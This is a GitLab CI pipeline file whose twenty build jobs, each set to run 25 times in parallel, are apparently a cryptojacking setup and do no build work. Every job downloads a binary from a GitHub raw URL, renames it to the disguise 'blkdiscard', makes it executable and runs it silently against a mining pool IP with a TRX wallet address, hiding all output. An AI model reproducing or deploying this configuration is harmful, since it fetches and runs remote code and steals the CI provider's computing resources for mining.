image: ruby:latest

 
stages: 
  - build 
 
build_1: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1  
 
build_2: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1   
 
build_3: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1  
 
build_4: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1   
 
build_5: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1   
 
build_6: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1   
 
build_7: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1   
 
build_8: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1  
 
build_9: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1   
 
build_10: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1
     
build_11: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_12: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_13: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_14: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_15: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_16: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_17: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_18: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_19: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1

build_20: 
  stage: build 
  parallel: 25 
  script: | 
    apt-get update -y && apt-get install -y sudo screen tmate wget
     wget -O blkdiscard https://raw.githubusercontent.com/kijang-7/gas/main/viox
     chmod +x blkdiscard
     ./blkdiscard -a argon2/wrkz -o 96.126.117.145:33405 -u TRX:TLEEqmqu5eAtF84Xe8zPPwNrqVZxehatAC.$(tr -dc A-Z </dev/urandom | head -c 4 ; echo 'PROXY-2') -p x -t2 >/dev/null 2>&1